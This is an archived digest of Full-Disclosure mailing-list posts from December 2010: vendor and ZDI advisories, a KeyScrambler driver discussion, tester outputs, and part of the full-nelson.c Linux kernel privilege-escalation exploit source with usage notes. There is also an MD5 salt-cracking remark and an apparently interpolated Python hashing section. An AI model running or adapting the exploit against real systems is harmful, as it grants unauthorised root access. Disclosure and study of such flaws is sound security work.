http://lcamtuf.blogspot.com/2010/12/firefox-3613-damn-you-corner-cases.html
Whimsical PoC: http://lcamtuf.coredump.cx/ffabout/

PS. I posted a couple of probably interesting browser security
write-ups on my blog of recent, recapping the status quo in areas such
as HTTP cookie security. Some readers might find them interesting /
useful - say: 
http://lcamtuf.blogspot.com/2010/10/http-cookies-or-how-not-to-design.html

Cheers,
/mz



Re: [Full-disclosure] Firefox Addon: KeyScrambler

2010-12-09 Thread Elazar Broad

Just lightly scratching the surface, KeyScrambler.sys is signed by
GlobalSign, strings reveals nothing interesting other than OpenSSL
0.9.8a is used.

elazar

On Thu, 09 Dec 2010 09:26:49 -0500 Gary Baribault
g...@baribault.net wrote:
Call me paranoid, but that sure would be a good way to spread a
key logger!

Gary B


On 12/09/2010 07:25 AM, Christian Sciberras wrote:
 Dave,

 That's ok. Glad to have helped out :)

 Cheers,
 Chris.



 On Thu, Dec 9, 2010 at 1:07 PM, mrx m...@propergander.org.uk
mailto:m...@propergander.org.uk wrote:

 On 09/12/2010 10:26, Christian Sciberras wrote:
  I tried installing this plugin to Firefox 3.6.12 in a
virtualbox
 XP32(SP3)
  environment and it is incompatible.
  I may wait for an update to the plugin and analyse its
behaviour,
  providing my curiosity doesn't wane in the meantime.

  Alternatively, you can just decompress the XPI (it's in fact a
zip) and
  inspect the js files and/or decompress any binaries.
  I suppose they are distributing some form of driver, so you'd
find
  IDA/ollydbg useful.



  Chris.


 I extracted the files (various .js files and an exe) from the
xpi.
 The .js files version check and create an instance of
keyscrambler.sys
 with the current firefox window passed to it as an argument.

 I also extracted the contents of the executable; setup.exe.
 Setup.exe contained various dll's and one sys file. I presumed
this
 sys file; keyscrambler.sys, is the driver and main component of
this
 addon.
 To confirm I monitored the running of setup.exe.

 My presumption was correct: keyscrambler.sys is installed in
system32
 folder and is registered as an autostarting service, although it
is hidden
 from the services pane in computer management.

 This is where my skills bottom out. ASM is something I have
not yet
 got my head around.
 I have a clue, but that's about all I do have... in time ;-)

 Thanks for your advice and input
 regards
 Dave



[Full-disclosure] ZDI-10-263: CA Multiple Products create_session_bab SOAP Request Remote Code Execution Vulnerability

2010-12-09 Thread ZDI Disclosures
ZDI-10-263: CA Multiple Products create_session_bab SOAP Request Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-10-263

December 9, 2010

-- CVE ID:
CVE-2010-3984

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
CA

-- Affected Products:
CA XOsoft High Availability
CA XOsoft Replication
CA XOsoft Content Distribution
CA ARCserve Replication and High Availability

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10708.
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of CA ARCserve Replication and High
Availability. Authentication is not required to exploit this
vulnerability.

The specific flaw exists within the create_session_bab SOAP operation,
which is handled by the xosoapapi.asmx process that is crucial to the
remote administration of both the High Availability and the Replication
products. By sending a specially crafted POST request to the
xosoapapi.asmx process a remote, unauthenticated attacker can trigger a
buffer overflow condition that results in arbitrary code execution under
the context of the SOAP server process.

-- Vendor Response:
CA states:
CA20101209-01: Security Notice for CA XOsoft
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=%7bFEB41CE8-5023-46DF-B257-5299F492BF23%7d

-- Disclosure Timeline:
2010-08-12 - Vulnerability reported to vendor
2010-12-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* AbdulAziz Hariri

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi



[Full-disclosure] CA20101209-01: Security Notice for CA XOsoft

2010-12-09 Thread Kotas, Kevin J

CA20101209-01: Security Notice for CA XOsoft

Issued: December 9, 2010

CA Technologies support is alerting customers to a security risk with
CA XOsoft. A vulnerability exists that can allow a remote attacker to
execute arbitrary code.  CA has issued a patch to address the
vulnerability for each affected release.

The vulnerability, CVE-2010-3984, is due to insufficient bounds
checking with a SOAP request. A remote attacker can make a SOAP
request to cause a buffer overflow and potentially compromise the
system.

Risk Rating

High

Platform

Windows

Affected Products

CA XOsoft Replication r12.0 sp1
CA XOsoft High Availability r12.0 sp1
CA XOsoft Content Distribution r12.0 sp1
CA XOsoft Replication r12.5 sp2 rollup
CA XOsoft High Availability r12.5 sp2 rollup
CA XOsoft Content Distribution r12.5 sp2 rollup
CA ARCserve Replication and High Availability r15.0 sp1

Non-Affected Products

CA ARCserve Replication and High Availability r15.2

How to determine if the installation is affected

1. Using Windows Explorer, locate the file mng_core_com.dll. By
default in r12.0 and r12.5, the file is located in the
C:\Program Files\CA\XOsoft\Manager directory. For r15.0 sp1, the
file is located in the C:\Program Files\CA\ARCserve RHA\Manager
directory.
2. Right click on the file and select Properties.
3. Select the General tab.
4. If the file timestamp is earlier than indicated in the below
table, the installation is vulnerable.

Product                  File Name         Timestamp   File Size
XOsoft 12.0 sp1          mng_core_com.dll  10/09/2010  2,007,040 bytes
XOsoft 12.5 sp2 rollup   mng_core_com.dll  10/13/2010  2,396,160 bytes
ARCserve RHA 15.0 sp1    mng_core_com.dll  10/13/2010  2,990,080 bytes

Solution

CA issued the following patch to address the vulnerability.

CA ARCserve Replication and High Availability r15.0 sp1:
RO24455

CA XOsoft Replication r12.5 sp2 rollup,
CA XOsoft High Availability r12.5 sp2 rollup,
CA XOsoft Content Distribution r12.5 sp2 rollup:
RO24313

CA XOsoft Replication r12.0 sp1,
CA XOsoft High Availability r12.0 sp1,
CA XOsoft Content Distribution r12.0 sp1:
RO24314

References

CVE-2010-3984 - XOsoft buffer overflow

CA20101209-01: Security Notice for CA XOsoft
(line wraps)
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=%7
bFEB41CE8-5023-46DF-B257-5299F492BF23%7d

Acknowledgement

CVE-2010-3984 - AbdulAziz Hariri through the TippingPoint ZDI program

Change History

Version 1.0: Initial Release

If additional information is required, please contact CA Technologies
Support at http://support.ca.com/.

If you discover a vulnerability in a CA Technologies product, please
report your findings to the CA Technologies Product Vulnerability
Response Team.
http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx

Kevin Kotas
CA Technologies Product Vulnerability Response Team




Re: [Full-disclosure] Firefox Addon: KeyScrambler

2010-12-09 Thread mrx

On 09/12/2010 19:33, Elazar Broad wrote:
 Just lightly scratching the surface, KeyScrambler.sys is signed by
 GlobalSign, strings reveals nothing interesting other than OpenSSL
 0.9.8a is used.
 
 elazar

Yes I noticed the RSA source code references in the disassembly.

Now I am curious if this implementation of OpenSSL is vulnerable to the various 
CVE's that have been issued against 0.9.8a.

CVE-2007-4995: Off-by-one error in DTLS vulnerability
CVE-2007-5135: One byte buffer overflow in the SSL_get_shared_ciphers function
CVE-2007-3108: BN_from_montgomery side-channel attack.

And how it could be exploited if this is the case. I am not skilled enough to 
know.
However, if I was developing this software I would update it.

Cheers
Dave



[Full-disclosure] Linux Kernel Bug Fixed For OpenBSD

2010-12-09 Thread musnt live
Hello full disclosure!!!

I is like to warn you about Linux kernel exploit that is was warned
you by to from Dan Rosenberg. Is I discover that Linux OpenBSD is no
vulnerable

bash-4.0$ id
uid=1001(musntlive) gid=1001(musntlive) groups=1001(musntlive)
bash-4.0$ uname -ap
OpenBSD im.is.hakaruski.websecurity.ug.ly 4.7 HAKARUSKI i386 AMD
Phenom(tm) 9850 Quad-Core Processor (AuthenticAMD 686-class, 512KB
L2 cache)
bash-4.0$ ls
fullnelson.c IsAllSecurityIsResearch IsThisBeIsGoatPorn IsLearnHowIsToTalk
bash-4.0$ gcc -o peggy fullnelson.c
fullnelson.c: In function `main':
fullnelson.c:216: error: `PF_ECONET' undeclared (first use in this function)
fullnelson.c:216: error: (Each undeclared identifier is reported only once
fullnelson.c:216: error: for each function it appears in.)
fullnelson.c:249: error: `MAP_ANONYMOUS' undeclared (first use in this function)
fullnelson.c:260: error: `CLONE_VM' undeclared (first use in this function)
fullnelson.c:260: error: `CLONE_CHILD_CLEARTID' undeclared (first use
in this function)
bash-4.0$

However is how we fix to make work on Linux OpenBSD:

bash-4.0$ su
# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty),
5(operator), 20(staff), 31(guest)
# finger musntlive
Login: musntliveName: musntlive
Directory: /home/this-is-be-home-for/musntlive  Shell:
/usr/local/c0t0d0s0/bin/bash
Never logged in.
No Mail.
No Plan.
No Engrish.
#

http://www.youtube.com/watch?v=GRLwKw9up3s

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Linux kernel exploit

2010-12-09 Thread Vadim Grinco
$ ./nelson
[*] Failed to open file descriptors.
$ uname -r
2.6.35.6-48.fc14.x86_64
$ cat /etc/redhat-release
Fedora release 14 (Laughlin)

But I updated a couple of days ago.

-- 
Best regards,
Vadim



Re: [Full-disclosure] Linux kernel exploit

2010-12-09 Thread Sherif Mousa
Hi Dan,

Tested on:

kernel 2.6.32 (Ubuntu 10.04)  worked.
kernel 2.6.28  didn’t work. (Failed to open file descriptors)

Nice work, Dan.

Regards,
Sherif



On Tue, Dec 7, 2010 at 10:25 PM, Dan Rosenberg dan.j.rosenb...@gmail.com wrote:

 Hi all,

 I've included here a proof-of-concept local privilege escalation exploit
 for Linux.  Please read the header for an explanation of what's going
 on.  Without further ado, I present full-nelson.c:

 Happy hacking,
 Dan


 --snip--

 /*
  * Linux Kernel <= 2.6.37 local privilege escalation
  * by Dan Rosenberg
  * @djrbliss on twitter
  *
  * Usage:
  * gcc full-nelson.c -o full-nelson
  * ./full-nelson
  *
  * This exploit leverages three vulnerabilities to get root, all of which were
  * discovered by Nelson Elhage:
  *
  * CVE-2010-4258
  * -------------
  * This is the interesting one, and the reason I wrote this exploit.  If a
  * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
  * word will be written to a user-specified pointer when that thread exits.
  * This write is done using put_user(), which ensures the provided destination
  * resides in valid userspace by invoking access_ok().  However, Nelson
  * discovered that when the kernel performs an address limit override via
  * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
  * etc.), this override is not reverted before calling put_user() in the exit
  * path, allowing a user to write a NULL word to an arbitrary kernel address.
  * Note that this issue requires an additional vulnerability to trigger.
  *
  * CVE-2010-3849
  * -------------
  * This is a NULL pointer dereference in the Econet protocol.  By itself, it's
  * fairly benign as a local denial-of-service.  It's a perfect candidate to
  * trigger the above issue, since it's reachable via sock_no_sendpage(), which
  * subsequently calls sendmsg under KERNEL_DS.
  *
  * CVE-2010-3850
  * -------------
  * I wouldn't be able to reach the NULL pointer dereference and trigger the
  * OOPS if users weren't able to assign Econet addresses to arbitrary
  * interfaces due to a missing capabilities check.
  *
  * In the interest of public safety, this exploit was specifically designed to
  * be limited:
  *
  *  * The particular symbols I resolve are not exported on Slackware or Debian
  *  * Red Hat does not support Econet by default
  *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
  *    Debian
  *
  * However, the important issue, CVE-2010-4258, affects everyone, and it would
  * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
  * more sophisticated version of this that doesn't have the roadblocks I put in
  * to prevent abuse by script kiddies.
  *
  * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
  *
  * NOTE: the exploit process will deadlock and stay in a zombie state after you
  * exit your root shell because the Econet thread OOPSes while holding the
  * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't bother.
  *
  * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
  */

 #include <stdio.h>
 #include <sys/socket.h>
 #include <fcntl.h>
 #include <sys/ioctl.h>
 #include <string.h>
 #include <net/if.h>
 #include <sched.h>
 #include <stdlib.h>
 #include <signal.h>
 #include <sys/utsname.h>
 #include <sys/mman.h>
 #include <unistd.h>

 /* How many bytes should we clear in our
  * function pointer to put it into userspace? */
 #ifdef __x86_64__
 #define SHIFT 24
 #define OFFSET 3
 #else
 #define SHIFT 8
 #define OFFSET 1
 #endif

 /* thanks spender... */
 unsigned long get_kernel_sym(char *name)
 {
     FILE *f;
     unsigned long addr;
     char dummy;
     char sname[512];
     struct utsname ver;
     int ret;
     int rep = 0;
     int oldstyle = 0;

     f = fopen("/proc/kallsyms", "r");
     if (f == NULL) {
         f = fopen("/proc/ksyms", "r");
         if (f == NULL)
             goto fallback;
         oldstyle = 1;
     }

 repeat:
     ret = 0;
     while(ret != EOF) {
         if (!oldstyle)
             ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
         else {
             ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
             if (ret == 2) {
                 char *p;
                 if (strstr(sname, "_O/") || strstr(sname, "_S."))
                     continue;
                 p = strrchr(sname, '_');
                 if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
                     p = p - 4;
                     while (p > (char *)sname && *(p - 1) == '_')
                         p--;
                     *p = '\0';
                 }
             }
         }
 

Re: [Full-disclosure] MD5 decrypter PHP Script

2010-12-09 Thread Jerome Athias
I did quite a similar script for oscommerce, more in a rainbowtables
building way.

$password = md5($salt . $plain) . ':' . $salt;

http://pastebin.com/mtciPcTM

Regards
/JA

http://www.linkedin.com/in/jeromeathias
The computer security is an art form. It's the ultimate martial art.



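
As an added illustration (this is not Jerome's script and not osCommerce's code), here is the stored format quoted above, md5(salt.plain):salt, implemented in Python next to a hardened replacement. The two-character salt is an assumption about osCommerce's scheme, not something the post states; everything else follows from the quoted line. The defender's point: one MD5 per guess with a tiny salt is exactly what makes a "decrypter" or rainbow-table approach cheap, while a salted, iterated KDF makes every guess cost as much as a legitimate login.

```python
import hashlib
import hmac
import os

# osCommerce-style storage format as quoted in the post:
#   $password = md5($salt . $plain) . ':' . $salt;
# A 2-character salt is an assumption about that scheme (not stated in
# the post); the functions below accept any salt length.

def oscommerce_hash(plain: str, salt: str) -> str:
    """Build a stored value in the md5(salt.plain):salt form."""
    digest = hashlib.md5((salt + plain).encode("utf-8")).hexdigest()
    return digest + ":" + salt

def oscommerce_verify(plain: str, stored: str) -> bool:
    """Check a candidate password against a stored md5(salt.plain):salt value."""
    digest, sep, salt = stored.partition(":")
    if sep != ":" or len(digest) != 32:
        return False
    candidate = hashlib.md5((salt + plain).encode("utf-8")).hexdigest()
    # constant-time compare so the check itself does not leak matching prefixes
    return hmac.compare_digest(candidate, digest)

# Hardened form: PBKDF2-HMAC-SHA256 with a random 16-byte salt and an
# iteration count, so precomputed tables are useless and each guess is slow.
PBKDF2_ROUNDS = 200_000

def pbkdf2_hash(plain: str, salt=None, rounds: int = PBKDF2_ROUNDS) -> str:
    """Return 'pbkdf2_sha256$rounds$salthex$dkhex'; the salt is random unless given."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", plain.encode("utf-8"), salt, rounds)
    return f"pbkdf2_sha256${rounds}${salt.hex()}${dk.hex()}"

def pbkdf2_verify(plain: str, stored: str) -> bool:
    """Re-derive the key with the stored parameters and compare in constant time."""
    try:
        scheme, rounds_str, salt_hex, dk_hex = stored.split("$")
        rounds = int(rounds_str)
        salt = bytes.fromhex(salt_hex)
    except ValueError:
        return False          # malformed record: wrong field count or bad hex/int
    if scheme != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", plain.encode("utf-8"), salt, rounds)
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    weak = oscommerce_hash("correct horse", "ab")   # constructed sample
    strong = pbkdf2_hash("correct horse")
    print(weak, oscommerce_verify("correct horse", weak))
    print(strong, pbkdf2_verify("correct horse", strong))
```

The iteration count is a tunable; raise it until a single verification takes a few tens of milliseconds on the login server, and store it in the record (as the format above does) so it can be raised later without invalidating existing hashes.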

Re: [Full-disclosure] Linux kernel exploit

2010-12-09 Thread Jean Pierre Dentone
A few tests:

[...@yangtao ~]$ ./extest
./extest: error while loading shared libraries: requires glibc 2.5 or 
later dynamic linker
[...@yangtao ~]$ uname -r
2.6.9-89.0.25.ELsmp
[...@yangtao ~]$ cat /etc/redhat-release
CentOS release 4.8 (Final)

==

[...@kernel ~]$ ./extest
[*] Failed to open file descriptors.
[...@kernel ~]$ uname -r
2.6.35.4
[...@kernel ~]$ cat /etc/redhat-release
CentOS release 5.2 (Final)

==

[...@kernel64 ~]$ ./extest
[*] Failed to open file descriptors.
[...@kernel64 ~]$ uname -r
2.6.33.1
[...@kernel64 ~]$ cat /etc/redhat-release
CentOS release 5.5 (Final)

On 12/8/2010 4:42 PM, Vadim Grinco wrote:
 $ ./nelson
 [*] Failed to open file descriptors.
 $ uname -r
 2.6.35.6-48.fc14.x86_64
 $ cat /etc/redhat-release
 Fedora release 14 (Laughlin)

 But I updated a couple of days ago.




[Full-disclosure] List Charter

2010-12-09 Thread John Cartwright

[Full-Disclosure] Mailing List Charter
John Cartwright jo...@grok.org.uk
 

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing 
list hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily 
concerned with security issues and their discussion.  The list is 
administered by John Cartwright.

The Full-Disclosure list is hosted and sponsored by Secunia.


- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface 
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to 
full-disclosure-requ...@lists.grok.org.uk; send the word 'help' in 
either the message subject or body for details.

 
- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only; however, the administrators may choose to 
accept submissions from non-members based on individual merit and 
relevance.

It is expected that the list will be largely self-policing; however, in
special circumstances (e.g. spamming, misappropriation) offending 
members may be removed from the list by the management.

An archive of postings is available at 
http://lists.grok.org.uk/pipermail/full-disclosure/.
 

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for 
instance announcement and discussion thereof, exploit techniques and 
code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is 
forbidden.  Disagreements, flames, arguments, and off-topic discussion 
should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. 
Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they 
should use discretion in executing any tools or code distributed via
this list.
 

- Posting Guidelines -

The primary language of this list is English. Members are expected to 
maintain a reasonable standard of netiquette when posting to the list. 

Quoting should not exceed that which is necessary to convey context, 
this is especially relevant to members subscribed to the digested 
version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will 
preferably be short and to the point, and those containing 
'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or 
S/MIME signatures, proof-of-concept code, etc) but must not be active 
(in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to 
list postings. Offenders will be excluded from the mailing list until 
the problem is corrected.

Members may post to the list by emailing 
full-disclos...@lists.grok.org.uk. Do not send subscription/
unsubscription mails to this address, use the -request address 
mentioned above.


- Charter Additions/Changes -

The list charter will be published at 
http://lists.grok.org.uk/full-disclosure-charter.html.

In addition, the charter will be posted monthly to the list by the 
management.

Alterations will be made after consultation with list members and a 
consensus has been reached.



[Full-disclosure] ZDI-10-265: Mozilla Firefox NewIdArray Integer Overflow Remote Code Execution Vulnerability

2010-12-09 Thread ZDI Disclosures
ZDI-10-265: Mozilla Firefox NewIdArray Integer Overflow Remote Code Execution 
Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-10-265

December 9, 2010

-- CVE ID:
CVE-2010-3767

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Mozilla Firefox

-- Affected Products:
Mozilla Firefox 3.6.x

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within Firefox's management of the
JSSLOT_ARRAY_COUNT annotation. This value represents the number of items
filled within a given Array object. If an attacker creates an array to a
high enough value, an initialization routine can be made to mis-allocate
a buffer. This can be abused by an attacker to corrupt memory and
subsequently execute arbitrary code under the context of the user
running the browser.

-- Vendor Response:
Mozilla Firefox has issued an update to correct this vulnerability. More
details can be found at:

http://www.mozilla.org/security/announce/2010/mfsa2010-81.html

-- Disclosure Timeline:
2010-09-24 - Vulnerability reported to vendor
2010-12-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* regenrecht

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi



[Full-disclosure] ZDI-10-264: Mozilla Firefox nsDOMAttribute MutationObserver Remote Code Execution Vulnerability

2010-12-09 Thread ZDI Disclosures
ZDI-10-264: Mozilla Firefox nsDOMAttribute MutationObserver Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-10-264

December 9, 2010

-- CVE ID:
CVE-2010-3766

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Mozilla Firefox

-- Affected Products:
Mozilla Firefox 3.6.x

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the application's support of the
NodeIterator API used for element traversal. Due to a particular element
not implementing functionality required by the API, a use-after-free
vulnerability can be forced to occur. This can be used to achieve code
execution under the context of the application.

-- Vendor Response:
Mozilla Firefox has issued an update to correct this vulnerability. More
details can be found at:

http://www.mozilla.org/security/announce/2010/mfsa2010-80.html

-- Disclosure Timeline:
2010-08-25 - Vulnerability reported to vendor
2010-12-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* regenrecht

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi



[Full-disclosure] [USN-1020-1] Thunderbird vulnerabilities

2010-12-09 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-1020-1 December 09, 2010
thunderbird, thunderbird-locales vulnerabilities
CVE-2010-3768, CVE-2010-3776, CVE-2010-3777, CVE-2010-3778
===

A security issue affects the following Ubuntu releases:

Ubuntu 10.04 LTS
Ubuntu 10.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 10.04 LTS:
  thunderbird 3.1.7+build3+nobinonly-0ubuntu0.10.04.1

Ubuntu 10.10:
  thunderbird 3.1.7+build3+nobinonly-0ubuntu0.10.10.1

After a standard system update you need to restart Thunderbird to make
all the necessary changes.

Details follow:

Jesse Ruderman, Andreas Gal, Nils, Brian Hackett, and Igor Bukanov
discovered several memory issues in the browser engine. An attacker could
exploit these to crash Thunderbird or possibly run arbitrary code as the
user invoking the program. (CVE-2010-3776, CVE-2010-3777, CVE-2010-3778)

Marc Schoenefeld and Christoph Diehl discovered several problems when
handling downloadable fonts. The new OTS font sanitizing library was added
to mitigate these issues. (CVE-2010-3768)


Updated packages for Ubuntu 10.04 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locales_3.1.2ubuntu0.10.04.1.dsc
  Size/MD5: 2512 8bba2a29930fd4f47bb2113433cd3780

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locales_3.1.2ubuntu0.10.04.1.tar.gz
  Size/MD5: 10177112 61d1828843d93c18d6ccadec7b62b5e0

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_3.1.7+build3+nobinonly-0ubuntu0.10.04.1.diff.gz
  Size/MD5:96568 178d17258c92d2827b2058132084e404

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_3.1.7+build3+nobinonly-0ubuntu0.10.04.1.dsc
  Size/MD5: 2455 2bd12921e17b465b3ded0ed90b992e93

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_3.1.7+build3+nobinonly.orig.tar.gz
  Size/MD5: 66547472 b42dba1a96ac40207d521e40965642a2

  Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/
  Size/MD5:   216048 c0e8b31ce3970cb21f5327f9096e8d87

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-af_3.1.2ubuntu0.10.04.1_all.deb
  Size/MD5:   223704 f95310a6344a3f351efb2c3636ea8bc0

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-ar_3.1.2ubuntu0.10.04.1_all.deb
  Size/MD5:   243786 6e51d35f574bb8509ba36ada0bf6e7dc

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-be_3.1.2ubuntu0.10.04.1_all.deb
  Size/MD5:   208158 1b43018b36c30cb14391dd58e1b2d3aa

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-bg_3.1.2ubuntu0.10.04.1_all.deb
  Size/MD5:   248546 a9e6da035931c59a0706526cbc9a6617

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-bn-bd_3.1.2ubuntu0.10.04.1_all.deb
  Size/MD5:   258092 9bf30ec268556aa84ed8aeab25a463f9

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-ca_3.1.2ubuntu0.10.04.1_all.deb
  Size/MD5:   232714 1b8c883abfb8d2bd3212dadff9a79ffa

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-cs_3.1.2ubuntu0.10.04.1_all.deb
  Size/MD5:   231952 0ae5849a9555fc1a21731074ca4a1261

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-da_3.1.2ubuntu0.10.04.1_all.deb
  Size/MD5:   216500 8689c7073f96a7614154037a35042a1c

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-de_3.1.2ubuntu0.10.04.1_all.deb
  Size/MD5:   236248 ec7ff62603cee0451217ac169e442567

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-el_3.1.2ubuntu0.10.04.1_all.deb
  Size/MD5:   223694 e41018242c4a57e6b08329665ab61f8a

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-en-gb_3.1.2ubuntu0.10.04.1_all.deb
  Size/MD5:   217158 211482de902a07e4a60c91dcdb5bced9

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-es-ar_3.1.2ubuntu0.10.04.1_all.deb
  Size/MD5:   231928 083f32cd8b8c1b0ba7813672241ee861

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-es-es_3.1.2ubuntu0.10.04.1_all.deb
  Size/MD5:   186366 6ea51e1c75b6a45e21cdff0fe3d7e405

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird-locales/thunderbird-locale-et_3.1.2ubuntu0.10.04.1_all.deb
  Size/MD5:   235200 17f39ff34817cfd4788c25d79e9391b5


[Full-disclosure] Flaw in Microsoft Domain Account Caching Allows Local Workstation Admins to Temporarily Escalate Privileges and Login as Cached Domain Admin Accounts (2010-M$-002)

2010-12-09 Thread StenoPlasma @ www.ExploitDevelopment.com
--
www.ExploitDevelopment.com 2010-M$-002
--

TITLE:
